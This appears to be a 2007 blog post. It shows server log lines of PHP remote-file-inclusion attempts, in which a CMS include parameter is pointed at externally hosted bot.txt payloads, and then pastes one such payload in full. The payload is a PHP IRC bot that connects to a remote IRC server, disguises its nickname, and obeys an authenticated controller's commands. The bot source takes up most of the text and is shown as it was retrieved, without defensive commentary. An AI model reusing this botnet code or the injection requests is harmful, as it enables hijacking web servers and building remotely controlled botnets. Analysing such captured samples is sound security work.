216.246.48.124 – - [23/Nov/2007:17:17:13 -0500] “GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41845 “-” “libwww-perl/5.808″
216.246.48.124 – - [23/Nov/2007:17:17:13 -0500] “GET /2007/11/20/current-crop-of-php-include-attempts//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41894 “-” “libwww-perl/5.808″
216.246.48.124 – - [23/Nov/2007:17:17:14 -0500] “GET /2007/11/20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41857 “-” “libwww-perl/5.808″
205.234.253.31 – - [23/Nov/2007:17:18:40 -0500] “GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41845 “-” “libwww-perl/5.808″
205.234.253.31 – - [23/Nov/2007:17:18:40 -0500] “GET /2007/11/20/current-crop-of-php-include-attempts//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41894 “-” “libwww-perl/5.808″
205.234.253.31 – - [23/Nov/2007:17:18:41 -0500] “GET /2007/11/20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41857 “-” “libwww-perl/5.808″
72.29.84.167 – - [23/Nov/2007:17:18:57 -0500] “GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41845 “-” “libwww-perl/5.808″
72.29.84.167 – - [23/Nov/2007:17:18:57 -0500] “GET /2007/11/20/current-crop-of-php-include-attempts//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41894 “-” “libwww-perl/5.808″
72.29.84.167 – - [23/Nov/2007:17:18:57 -0500] “GET /2007/11/20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41857 “-” “libwww-perl/5.808″
69.65.20.238 – - [23/Nov/2007:17:19:18 -0500] “GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/n_jeg/bot.txt?? HTTP/1.1″ 404 41832 “-” “libwww-perl/5.808″
69.65.20.238 – - [23/Nov/2007:17:19:18 -0500] “GET /2007/11/20/current-crop-of-php-include-attempts//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/n_jeg/bot.txt?? HTTP/1.1″ 404 41881 “-” “libwww-perl/5.808″
69.65.20.238 – - [23/Nov/2007:17:19:19 -0500] “GET /2007/11/20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/n_jeg/bot.txt?? HTTP/1.1″ 404 41844 “-” “libwww-perl/5.808″
205.134.252.23 – - [23/Nov/2007:17:21:05 -0500] “GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/n_jeg/bot.txt?? HTTP/1.1″ 404 41832 “-” “libwww-perl/5.808″

I have been downloading and looking at each of the files I see – most of them are the same or loosely copied from one another.  Today is the first time seeing this file for me.  The file follows:

</html>

<title>31337</title>

<?php

//fighter script – BAJAY

function working() {

$querym=array(

“?”,

“!”,

“^^”,

” ^^”,

” “,

” ”,

” ~:>”,

” ~”,

” ”,

“,”,

“.”,

“a”,

“i”,

“u”,

“e”,

“o”,

“z”,

“v”,

“z”,

“x”,

“c”,

“p”,

“m”,

“t”,

“k”,

“b”,

“s”,

“u”,

“bot”,

“g”,

“lo”,

“jo”,

“lol”

);

$tsu1=array(“`”,”|”,”[","]“,”{“,”}”,”^”,”“);
$tsu2=array(“`”,”|”,”[","]“,”{“,”}”,”^”,”-”,”\\”,”“);
$nicky=array(

 ”indotong”,

 ”rujange”,

 ”kentungs`”,

 ”sa_bosox”,

 ”japut1h”,

 ”start-Tegal”,

 ”stafp-pol”,

 ”apring”,

 ”my-bojo”,

 ”didiamu”,

 ”acongkasep”,

 ”rahasiailahi”,

 ”kutukurap”,

 ”duniagame”,

 ”pipilak”,

 ”Deeams”,

 ”Dewiani”,

 ”Lohanes”,

 ”Semsem2″,

 ”kuruyuk”,

 ”J4mput9″,

 ”acongTop”,

 ”bojokuayu”,

 ”Yuliyanti”,

 ”Ratnazar1″,

 ”Mydidit”,

 ”Rebecha”,

 ”Rastang”,

 ”Ganjils”,

 ”Bob-ho”,

 ”Dhinihari”,

 ”Dewimalam”,

 ”Lunaks”,

 ”Lowo-lawet”,

 ”Kolor-ku”,

 ”repolisi”,

 ”macanireng”,

 ”ivantat”,

 ”Kasugihan”,

 ”Kasiandeh”,

 ”awakapal”,

 ”Rachings”,

 ”War-tol”,

 ”Warnetlu”,

 ”Antikus”,

 ”[Dwirais]“,

 ”Phoecrot”,

 ”hiumania”,

 ”mas-amain”,

 ”Fafa-item”,

 ”Neonoek”,

 ”mba-abel”,

 ”Bencana”,

 ”nyosor”,

 ”Fitaken”,

 ”novakerep”,

 ”poerin”,

 ”lembene”,

 ”[sutijah]“,

 ”Skickmat”,

 ”Depangank”,

 ”Bonutang”,

 ”Stelangas”,

 ”Hellomam”,

 ”Pinkwingke”,

 ”Rolsepatu”,

 ”Defanku”,

 ”Mamalia”,

 ”Grahams”,

 ”Rocok”,

 ”jintuL-”,

 ”Urunan”,

 ”Piceks”,

 ”Kirbaju”,

 ”Asinans”,

 ”Muluk”,

 ”Mainanku”,

 ”Memete”,

 ”Kerambol”,

 ”Morbaut”,

 ”Clanane”,

 ”Nicitirta”,

 ”Jahlogo”,

 ”Sogokeh”,

 ”Hayamwuruk”,

 ”Selipan”,

 ”Myculun”,

 ”Mybojoe”,

 ”Selething”,

 ”T|kets”,

 ”Kompromi”,

 ”Montoks”,

 ”Trinitad”,

 ”Turboxs”,

 ”Mymata”,

 ”Indomobil”,

 ”KotaTegalkoe”,

 ”Peramal”,

 ”Hilangkoe”,

 ”Jalangs”,

 ”Jeengkel”,

 ”KaKikuda”,

 ”zhempol”,

 ”Pupens”,

 ”reneo”,

 ”[dorce]“,

 ”[yakin]“,

 ”[sung]“,

 ”[asli]“,

 ”suratan”,

 ”Cemplunk”,

 ”ladood”,

 ”lodados”,

 ”Jaambret”,

 ”Nyanyie”,

 ”Karmate”,

 ”Kunclup”,

 ”Simiskin”,

 ”Kamprets”,

 ”Kandang”,

 ”Kamuse”,

 ”Kendils”,

 ”Ketans”,

 ”Maantri”,

 ”anjengk”,

 ”angklung”,

 ”Kopok”,

 ”Krasi”,

 ”Kotors”,

 ”Karpets”,

 ”Kejangs”,

 ”Antraxs”,

 ”Adaband”,

 ”Kakusung”,

 ”Cocoran”,

 ”Bebelak”,

 ”Buluss”,

 ”Banatung”,

 ”Bembem”,

 ”Buntung”,

 ”Boroks”,

 ”Bambangs”,

 ”Bonteng”,

 ”Bumbu”,

 ”Bagasi”,

 ”Bimbing”,

 ”Chawets”,

 ”Coontex”,

 ”Clikat”,

 ”Cemceman”,

 ”Cokore”,

 ”Cuning”,

 ”Karmans”,

 ”Kodils”,

 ”Kaamra”,

 ”Darjo”,

 ”Dawud”,

 ”Daarto”,

 ”Damrie”,

 ”Dakroni”,

 ”Dimyati”,

 ”Dulung”,

 ”Enteng”,

 ”Emaxs”,

 ”Lomoboh”,

 ”Comodore”,

 ”Cimenks”,

 ”Cerutu”,

 ”Contonge”,

 ”Cukek”,

 ”Comblang”,

 ”Cemplak”,

 ”Cemanie”,

 ”Cembok”,

 ”Cekram”,

 ”Tegasung”,

 ”Tegarlah”,

 ”Teguhlah”,

 ”Tegeltak”,

 ”Tempek”,

 ”Antraxs”,

 ”Ampow”,

 ”Azdan”,

 ”Aburadul”,

 ”Antro”,

 ”Amings”,

 ”Angrexs”,

 ”Asrama”,

 ”Alimsung”,

 ”Aalas”,

 ”Abangku”,

 ”Amise”,

 ”Aconks”,

 ”Acongcup”,

 ”Acongsu”,

 ”Aconger”,

 ”Acongus”,

 ”Acongen”,

 ”sshd”,

 ”Masterkid”,

 ”alexutz”,

 ”andreea”,

 ”diana”,

 ”marius”,

 ”r00t”,

 ”kit”,

 ”mihai”,

 ”mihaela”,

 ”mario”,

 ”daiana”,

 ”andrei”,

 ”andreia”,

 ”tigan”,

 ”petre”,

 ”peter”,

 ”alexandre”,

 ”raluca”,

 ”master”,

 ”kid”,

 ”alias”,

 ”sbin”,

 ”p0rt”,

 ”sync”,

 ”mildest”,

 ”xzvf”,

 ”tar”,

 ”tgz”,

 ”dfg”,

 ”netcatxpl”,

 ”xpl”,

 ”xop”,

 ”xpls”,

 ”xploit”,

 ”xploits”,

 ”drxrwx”,

 ”drx-x”,

 ”system32″,

 ”alexandru”,

 ”alexander”,

 ”mihaela”,

 ”andrusca”,

 ”andra”,

 ”darius”,

 ”dani”,

 ”darnie”,

 ”daniel”,

 ”daniela”,

 ”mist3r”,

 ”x9v93c”,

 ”hunglec”,

 ”blasje”,

 ”bash”,

 ”blicke”,

 ”foirne”,

 ”wonder”,

 ”cvv2″,

 ”ssn”,

 ”creditcard”,

 ”ccnumber”,

 ”usher”,

 ”salam”,

 ”guta”,

 ”gutza”,

 ”biatchx”,

 ”bitch”,

 ”bitchX”,

 ”cine3″,

 ”scufitza”,

 ”copiluldeaur”,

 ”b0r4k”,

 ”counter”,

 ”strike”,

 ”usuf”,

 ”erny”,

 ”ernest”,

 ”modjo”,

 ”jinger”,

 ”b0ts”,

 ”r00ter”,

 ”g00gler”,

 ”mistcke”,

 ”linuxhack”,

 ”linuxhacker”,

 ”hacked”,

 ”fain”,

 ”ssl”,

 ”czxvr”,

 ”alb”,

 ”rosu”,

 ”romania”,

 ”rusia”,

 ”uk”,

 ”anglia”,

 ”comment”,

 ”hi5″,

 ”yah00″,

 ”silence”,

 ”us-com”,

 ”htiermc”,

 ”c00ldown”,

 ”misteryo”,

 ”hasked”,

 ”billaio”,

 ”smeoua”,

 ”muie”,

 ”sugator”,

 ”hashed”,

 ”f0lds”,

 ”folk”,

 ”f0lks”,

 ”numeroben”,

 ”hulk”,

 ”hiscke”,

 ”unae”,

 ”unhackable”,

 ”unhacker”,

 ”h4ack3rz”,

 ”hackerz”,

 ”ruter”,

 ”inji”,

 ”injecto”,

 ”freespace”,

 ”bulling”,

 ”mihaio”,

 ”ulgia”,

 ”c992mc”,

 ”miskce”,

 ”uber”,

 ”n0r”,

 ”c0x”,

 ”niekad”,

 ”naked”,

 ”nakedboy”,

 ”b0ys”,

 ”b0y”,

 ”messenger”,

 ”hopa”,

 ”hai-hui”,

 ”power-me”,

 ”sekos”,

 ”micke”,

 ”n0tron”,

 ”ron”,

 ”d0llars”,

 ”Euros”,

 ”pavalgia”,

 ”nasty”,

 ”hideend”,

 ”miskr3c”,

 ”incjen”,

 ”mass”,

 ”mailers”,

 ”mail3r”,

 ”th3kid”,

 ”k1d”,

 ”hepa”,

 ”m00r-d3f”,

 ”tzaca-paca”,

 ”headshot”,

 ”higgings”,

 ”slapest”,

 ”gansta”,

 ”gigging”,

 ”oame”,

 ”aoana”,

 ”mcike_dke”,

 ”blible”,

 ”XeqtR”,

 ”Xander”,

 ”xXx”,

 ”xxL”,

 ”vartmp”,

 ”0aoek”,

 ”summer”,

 ”etez”,

 ”crucike”,

 ”n0rme”,

 ”mihale”,

 ”c0rneaz”,

 ”blestem”,

 ”ghoost”,

 ”sicles”,

 ”c0mrsze”,

 ”sckme”,

 ”abie9t”,

 ”g912mc”,

 ”opernms”,

 ”micake”,

 ”qsuen”,

 ”zquers”,

 ”targetzd”,

 ”kem30ce”,

 ”nik1rc”,

 ”miosugi”,

 ”sugipula”,

 ”alupigus”,

 ”criminal”,

 ”danke”,

 ”shonw”,

 ”c0mrme”,

 ”muhahah”,

 ”biker4zs”,

 ”ckkemc”,

 ”clujeane”,

 ”hepahofn”,

 ”hepafon”,

 ”blackspace”,

 ”aabbcc”,

 ”ni1krc”,

 ”perosume”,

 ”perugis”,

 ”cliskeacz”,

 ”hennmx0c”,

 ”gbusf41″,

 ”bv9mvu3″,

 ”nik3rcs”,

 ”ghruwec”,

 ”slickez”,

 ”burgez”,

 ”h4mburger”,

 ”dijenmcie”,

 ”pijakence”,

 ”hai-blaeh”,

 ”power-you”,

 ”djstone”,

 ”djkid”,

 ”djthekid”,

 ”djmaster”,

 ”eftimie”,

 ”djcorason”,

 ”djalex”,

 ”djconstantin”,

 ”djbitch”,

 ”djk1d”,

 ”djtarget”,

 ”masterjungel”,

 ”daradaam”,

 ”uhmenze”,

 ”glicjex”,

 ”fortex”,

 ”hepafoneav”,

 ”m00rd3r”,

 ”tzacapaca”,

 ”nijeaz”,

 ”clijekcmez”,

 ”okkmmenc”,

 ”psyBNCz”,

 ”shellZ0″,

 ”kinderuL”,

 ”XeqtR”,

 ”metrolink”,

 ”ana”,

 ”anna”,

 ”squre”,

 ”xzvf0″,

 ”k1d-”,

 ”norman”,

 ”zquRs”,

 ”howhigh”,

 ”howhigt2″,

 ”blessus”,

 ”am3rica”,

 ”amer1ca”,

 ”spion”,

 ”spypower”,

 ”nextfan”,

 ”upl0ad”,

 ”s3arch”,

 ”searchX”,

 ”b0rak”,

 ”w00ps”,

 ”s0x”,

 ”nefertiti”,

 ”woops”,

 ”higlas”,

 ”cronx”,

 ”sown”,

 ”zappura”,

 ”heavenX”,

 ”muhahah1″,

 ”biker4zs1″,

 ”ckkemc1″,

 ”clujeane1″,

 ”hepahofn1″,

 ”hepafon1″,

 ”blackspace1″,

 ”aabbcc1″,

 ”ni1krc1″,

 ”perosume1″,

 ”perugis1″,

 ”cliskeacz1″,

 ”hennmx0c1″,

 ”gbusf411″,

 ”bv9mvu31″,

 ”nik3rcs1″,

 ”ghruwec1″,

 ”slickez1″,

 ”burgez1″,

 ”h4mburger1″,

 ”dijenmcie1″,

 ”pijakence1″,

 ”hai-blaeh1″,

 ”power-you1″,

 ”djstone1″,

 ”djkid1″,

 ”djthekid1″,

 ”djmaster1″,

 ”eftimie1″,

 ”djcorason1″,

 ”djalex1″,

 ”djconstantin1″,

 ”djbitch1″,

 ”djk1d1″,

 ”djtarget1″,

 ”masterjungel1″,

 ”daradaam1″,

 ”uhmenze1″,

 ”glicjex1″,

 ”fortex1″,

 ”hepafoneav1″,

 ”m00rd3r1″,

 ”tzacapaca1″,

 ”nijeaz1″,

 ”clijekcmez1″,

 ”okkmmenc1″,

 ”psyBNCz1″,

 ”shellZX”,

);

$usr1=array(

“zider”,

);

$nick = $nicky[rand(0,count($nicky) - 1)];
$awaymsg = “_4ÃfĮâ€^TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚»_8!_4ÃfĮâ€^TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚« 4H4Kim _8CÃfĮâ€^TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚®ÃfĮâ€^TMÃf†â€™Ãfƒâ€šÃf‚«wS _4ÃfĮâ€^TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚»_8!_4ÃfĮâ€^TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚«__”;
$identify = ”;

$Admin = ‘zaNga’;

$BOT_PASSWORD = ’123′;

$channels = ‘netcat’;$remotehst2= array(“irc.yogyakarta.cn”);
$remotehost= $remotehst2[rand(0,count($remotehst2) - 1)];
$port = ’6667′;$raway = “on”;

$realname = $nick;

$counterfp = 0;

$channels = str_replace(“CNL”,”",$channels);
print “<body bgcolor=#000000 text=#C0C0C0>”;
print “<b>== Connecting to $remotehost…</b>”;

$log = “off”;

$saway = “1″;

if (!$stime) { $stime = time(); }

if (!$port) { $port = “6666″; }

$Admin = strtolower($Admin);

$auth = array($Admin => array(“name” => $Admin, “pass” => $BOT_PASSWORD, “auth” => 1,”status” => “Admin”));

$username = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
$keluar = 0;

$akill = 1;

$katime = 0;

$localhost = ‘localhost’;

$dayload = date(“H:i:s d/m/Y”);

ini_set(‘user_agent’,'MSIE 5\.5;’);

set_time_limit(0);

define (‘CRL’, “\r\n”);

$channels = strtolower($channels).” “;

$channel = explode(” “, $channels);

do {

  $fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 30);
  if(!$fp) {

        if ( $counterfp <= 200 ) {

                 $counterfp = $counterfp+1;

                 working($nick);

         }

         else {

            print "<br><b>Cannot connect to $remotehost!<br>Please Try Another Server!</b>";

            $keluar = 1;

            exit;

         }

}

  print “<br><b>== Suceeded connection</b>”;
  $Header = ‘NICK ‘.$nick . CRL;

  $Header .= ‘USER ‘.$username.’ ‘.$localhost.’ ‘.$remotehost.’ :’.$realname . CRL;
  fputs($fp, $Header);

  $response = ”;

  while (!feof($fp)) {

        $response .= fgets($fp, 1024);

         while (substr_count($response,CRL) != 0) {

                 $offset = strpos($response, CRL);

                 $data = substr($response,0,$offset);

                 $response = substr($response,$offset+2);

                 if (substr($data,0,1) == ':') {

                         $offsetA = strpos($data, ' ');

                         $dFrom = substr($data,1,$offsetA-1);

                         $offsetB = strpos($data, ' :');

                         $dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1);

                         $offsetC = strpos($data, '!');

                         $dNick = substr($data,1,$offsetC-1);

                         $iText = substr($data,$offsetB+2);

             if ( substr($dCommand,0,3) == '004' ) {

                           fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify.  CRL);

                           if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); }

                           fputs($fp, 'NOTICE ' . $Admin . ' :Halo bos besar!' .  CRL);

                           foreach ($channel as $v) {

                                 fputs($fp, 'JOIN ' .$v . CRL);

                           }

                           $pong1 = '1';

             }

                         elseif (substr($dCommand,0,3)=='465') {

                                 print "<br><b>== This bot have been autokilled.</b>";

                                 $akill = 2;

                         }

                         elseif (substr($dCommand,0,3)=='433') {

                                 $nick = $nicky[rand(0,count($nicky) - 1)];

                                 fputs($fp, 'NICK '.$nick . CRL);

                         }

                         elseif (substr($dCommand,0,3)=='432') {

                                 $nick = $nick.$username;

                                 fputs($fp, 'NICK '.$nick . CRL);

                         }

                         if (eregi('.dal.net',$dNick) && $akill==2) {

                                 if (eregi('AKILL ID:',$data) || eregi('Your hostmask is',$data) || eregi('Your IP is',$data)) {

                                         print "<br><b>".strstr($data,'***')." </b>";

                                         if (eregi('Your IP is',$data)) {

                                                 $keluar = 1;

                                                 exit;

                                         }

                                 }

                         }

                         $dcom = explode(" ", $dCommand);

                         $dNick = strtolower($dNick);

                         if ($dcom[0]=='KICK' && $dcom[2]==$nick) {

                                 fputs($fp, 'JOIN ' .$dcom[1]. CRL);

                         }

                         elseif ($dcom[0]=='NICK' || $dcom[0]=='QUIT' || $dcom[0]=='PART') {

                                 if ($auth["$dNick"]) {

                                         if ($auth["$dNick"]["pass"]) {

                                                 if ($auth["$dNick"]["auth"]==2) {

                                                         if ($dcom[0]=='NICK') {

                                                                 $com = explode(" ", $data);

                                                                 $chnick = strtolower(str_replace(':','',$com[2]));

                                                                 if ($dNick!=$chnick) {

                                                                         $auth["$dNick"]["auth"] = 1;

                                                                         fputs($fp,'NOTICE '.$chnick.' :selamat istirahat bos! ' . CRL);

                                                                 }

                                                         } else { $auth["$dNick"]["auth"] = 1; fputs($fp,'NOTICE '.$dNick.' :selamat istirahat bos! ' . CRL); }

                                                 }

                                         } else { fputs($fp,'NOTICE ' . $dNick . ' :pass your pass ' . CRL); }

                                 }

                         }

                         elseif ($dcom[0]=='307' && strtolower($dcom[2])==$whois) {

                                 $dcom[2] = strtolower($dcom[2]);

                                 if ($auth["$dcom[2]"]) {

                                         if ($auth["$dcom[2]"]["pass"]) {

                                                 if ($auth["$dcom[2]"]["auth"]==1) {

                                                         $auth["$dcom[2]"]["auth"] = 2; $whois = "";

                                                         fputs($fp,'NOTICE ' . $dcom[2] . ' :kamu masukan password as '.$auth["$dcom[2]"]["status"].' of this bot! ' . CRL);

                                                 } else { fputs($fp,'NOTICE ' . $dcom[2] . ' :password oke bos aChOnGs seep emuach di titid! ' . CRL); }

                                         } else { fputs($fp,'NOTICE ' . $dcom[2] . '  ass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }

                                 } else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }

                         }

                         elseif ($dcom[0]=='NOTICE') {

                                 $com = explode(" ", $data);

                                 if ($com[3]==':KB' && $com[4] && $com[5] && $com[6]) {

                                         $msg = strreplace('','',$data);

                                         $msg = strstr($msg,":KB");

                                         $msg = strreplace(":KB $com[4]","",$msg);

                                         fputs($fp, 'KICK '.$com[4].' '.$com[5].' :'.$msg . CRL);

                                         fputs($fp, 'MODE '.$com[4].' +b *!*'.$com[6] . CRL);

                                 }

                         }

                         elseif ($dcom[0]=='PRIVMSG') {

                                 $com = explode(" ", $data);

                                 if ($com[3]==':VERSION') {

                                         fputs($fp,'NOTICE '.$dNick.' :'.chr(1).'VERSION mIRC v6.16 Khaled Mardam-Bey'.chr(1) . CRL);

                                 }

                                 elseif ($auth["$dNick"]["status"] && $com[3]==':auth' && $com[4]) {

                                         if ($auth["$dNick"]) {

                                                 if ($auth["$dNick"]["pass"]) {

                                                         if ($auth["$dNick"]["auth"]==1) {

                                                                 if ($com[4]===$auth["$dNick"]["pass"]) {

                                                                         $auth["$dNick"]["auth"] = 2;

                                                                         fputs($fp,'NOTICE ' . $dNick . ' :kamu masukkan password as '.$auth["$dNick"]["status"].' of this bot! ' . CRL);

                                                                 } else { fputs($fp,'NOTICE ' . $dNick . ' :passworde salah syu! Auth salah Shu! ' . CRL); }

                                                         } else { fputs($fp,'NOTICE ' . $dNick . ' :password bener bos aChOnGs emang oke! ' . CRL); }

                                                 } else { fputs($fp,'NOTICE ' . $dNick . '  ass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }

                                         } else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }

                                 }

                                 elseif ($auth["$dNick"]["status"] && $com[3]==':deauth') {

                                         if ($auth["$dNick"]) {

                                                 if ($auth["$dNick"]["pass"]) {

                                                         if ($auth["$dNick"]["auth"]==2) {

                                                                 $auth["$dNick"]["auth"] = 1;

                                                                 fputs($fp,'NOTICE ' . $dNick . ' :You`re LogOut! ' . CRL);

                                                         } else { fputs($fp,'NOTICE ' . $dNick . ' :You`re Already LogOut! ' . CRL); }

                                                 } else { fputs($fp,'NOTICE ' . $dNick . '  ass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }

                                         } else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }

                                 }

                                 elseif ($auth["$dNick"]["status"] && $com[3]==':pass' && $com[4]) {

                                         if ($auth["$dNick"]) {

                                                 if (!$auth["$dNick"]["pass"]) {

                                                         $auth["$dNick"]["pass"] = $com[4];

                                                         $auth["$dNick"]["auth"] = 1;

                                                         fputs($fp,'NOTICE ' . $dNick . ' :Your Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);

                                                 } else { fputs($fp,'NOTICE ' . $dNick . '  ass Already Set! Type: auth <your pass> To Get Authorized ' . CRL); }

                                         } else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }

                                 }

                                 elseif ($auth["$dNick"]["status"] && $com[3]==':chgpass' && $com[4] && $com[5]) {

                                         if ($auth["$dNick"]) {

                                                 if ($auth["$dNick"]["auth"]==2) {

                                                         if ($com[4]===$auth["$dNick"]["pass"]) {

                                                                 $auth["$dNick"]["pass"] = $com[5];

                                                                 fputs($fp,'NOTICE ' . $dNick . ' :Your New Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);

                                                         } else { fputs($fp,'NOTICE ' . $dNick . ' :Your Old Pass Wrong! Type: chgpass <old pass> <new pass> To Change Your Auth Pass ' . CRL); }

                                                 } else { fputs($fp,'NOTICE ' . $dNick . '  lease Auth First! Type: auth <your pass> To Authorized ' . CRL); }

                                         } else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }

                                 }

                                 elseif ($auth["$dNick"]["status"] && $com[3]==':adduser' && $com[4] && $com[4]!=$nick && $com[5]) {

                                         $com[4] = strtolower($com[4]);

                                         if ($auth["$dNick"]["auth"]==2) {

                                                 if ($auth["$dNick"]["status"]=="Admin") {

                                                         if ($com[5]=="master" || $com[5]=="user") {

                                                                 $auth["$com[4]"]["name"] = $com[4];

                                                                 $auth["$com[4]"]["status"] = $com[5];

                                                                 fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);

                                                                 fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass> To Set Your Pass ' . CRL);

                                                         } else { fputs($fp,'NOTICE ' . $dNick . ' :salah Command! Type: adduser <nick> <master/user> ' . CRL); }

                                                 } elseif ($auth["$dNick"]["status"]=="master") {

                                                         if (!$auth["$com[4]"]) {

                                                                 if ($com[5]=="user") {

                                                                         $auth["$com[4]"]["name"] = $com[4];

                                                                         $auth["$com[4]"]["status"] = $com[5];

                                                                         fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);

                                                                         fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass33] <Spyderur Pass ' . CRL);

                                                                 } else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: adduser <nick> user ' . CRL); }

                                                         } else { fputs($fp,'NOTICE ' . $dNick . ' :User Already Exist! Aborting AddUser! ' . CRL); }

                                                 } else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }

                                         } else { fputs($fp,'NOTICE ' . $dNick . '  lease Auth First! Type: auth <your pass> To Authorized ' . CRL); }

                                 }

                                 elseif ($auth["$dNick"]["status"] && $com[3]==':deluser' && $com[4]) {

                                         $com[4] = strtolower($com[4]);

                                         if ($auth["$dNick"]["auth"]==2) {

                                                 if ($auth["$dNick"]["status"]=="Admin") {

                                                         if ($auth["$com[4]"]["status"]=="master" || $auth["$com[4]"]["status"]=="user") {

                                                                 unset($auth["$com[4]"]);

                                                                 fputs($fp,'NOTICE ' . $dNick . '  elUser :'.$com[4].' From My UserList ' . CRL);

                                                                 fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);

                                                         } else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }

                                                 } elseif ($auth["$dNick"]["status"]=="master") {

                                                         if ($auth["$com[4]"]["status"]=="user") {

                                                                 unset($auth["$com[4]"]);

                                                                 fputs($fp,'NOTICE ' . $dNick . '  elUser :'.$com[4].' From My UserList ' . CRL);

                                                                 fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);

                                                         } else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }

                                                 } else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }

                                         } else { fputs($fp,'NOTICE ' . $dNick . '  lease Auth First! Type: auth <your pass> To Authorized ' . CRL); }

                                 }

                                 elseif ($auth["$dNick"]["status"]) {

                                 if (ereg(":`",$com[3]) || ereg(":!",$com[3])) {

                                         $chan = strstr($dCommand,"#");

                                         $anick = str_replace("PRIVMSG ","",$dCommand);

                                         if ($com[3]==':!auth') {

                                                 if ($auth["$dNick"]["auth"]==2) {

                                                         fputs($fp,'NOTICE '.$dNick.' :Jembutz..! You`re already Authorized!' . CRL);

                                                 } else {

                                                         $whois = $dNick;

                                                         fputs($fp,'WHOIS '.$dNick . CRL);

                                                 }

                                         } elseif ($com[3]==':`auth' && $chan) {

                                                 if ($auth["$dNick"]["auth"]==2) {

                                                         fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' Hamba siap mencari janda Bos!' . CRL);

                                                 } else { fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' Raimu bukan bosku cok!' . CRL); }

                                         } elseif ($auth["$dNick"]["auth"]==2) {

                                                 if ($com[3]==':`say' && $com[4] && $chan) {

                                                         $msg = strstr($data,":`say");

                                                         $msg = str_replace(":`say ","",$msg);

                                                         fputs($fp,'PRIVMSG '.$chan.' :'.$msg. CRL);

                                                 }

                                                 elseif ($com[3]==':`act' && $com[4] && $chan) {

                                                         $msg = strstr($data,":`act");

                                                         $msg = str_replace(":`act ","",$msg);

                                                         fputs($fp,'PRIVMSG '.$chan.' :ACTION '.$msg.''. CRL);

                                                 }

                                                 elseif ($com[3]==':`slap' && $com[4] && $chan) {

                                                         fputs($fp,'PRIVMSG '.$chan.' :ACTION slaps '.$com[4].' Jembut Raimu wani karo bosku around a bit with a large trout'. CRL);

                                                 }

                                                 elseif ($com[3]==':`msg' && $com[4] && $com[5]) {

                                                         $msg = strstr($data,":`msg");

                                                         $msg = str_replace(":`msg $com[4] ","",$msg);

                                                         fputs($fp,'PRIVMSG '.$com[4].' :'.$msg. CRL);

                                                 }

